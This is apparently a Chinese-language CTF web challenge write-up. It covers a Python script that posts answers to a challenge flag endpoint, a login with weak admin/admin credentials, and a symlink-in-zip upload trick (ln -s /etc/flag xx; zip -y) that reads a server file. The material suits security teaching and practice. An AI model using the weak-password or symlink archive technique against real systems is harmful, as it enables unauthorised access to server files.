就这么直接
查看一下源码会发现一个hint.php,访问:
<?php
$key = "********";
srand(time());
$a = rand(0,100);
$b = rand(0,100);
$c = rand(0,100);
$d = rand(0,100);
$e = rand(0,100);
$result = ((($a - $b)/$c)+$d) * $e;
$result = md5($key.$result.$key);
echo $result;
?>
利用python脚本,
import requests
import re
def get():
url='http://183.129.189.60:10007/flag.php'
data={
'answer': 'c6b63823cea1cd7e136e19b1f8c52258'
}
r=requests.post(url,data=data)
f = open("web2.txt", 'w')
f.write(r.text)
f.close()
print("get success!")
def getTitle(booktext):
return re.search( r'<!--(.+?)-->', booktext, re.M|re.I).group(1)
def sent():
f = open("web2.txt", 'r')
message = f.read()
f.close()
message = getTitle(message)
print(message)
url='http://183.129.189.60:10007/flag.php'
data={
'answer': message
}
r=requests.post(url,data=data)
print(r.text)
print("post success!")
if __name__ == '__main__':
get()
sent()
这个脚本是借鉴其他师傅的,直接跑出flag。
getflag
弱口令/软连接:
试了试万能密码,发现不行,最后发现弱口令可以,username:admin,password:admin;登录之后会出现一个上传文件的界面
提示是上传一个压缩包,然后给出了flag路径:/etc/flag
这里就需要用到软连接:
ln -s 源文件 目标文件
当我们需要在不同的目录,用到相同的文件时,我们不需要在每一个需要的目录下都放一个必须相同的文件,我们只要在某个固定的目录,放上该文件,然后在其它的 目录下用ln命令链接(link)它就可以,不必重复的占用磁盘空间。
利用软连接将flag进行路径进行索引,将它压缩
ln -s /etc/flag xx
zip -y 1.zip xx
上传1.zip 就得到了flag。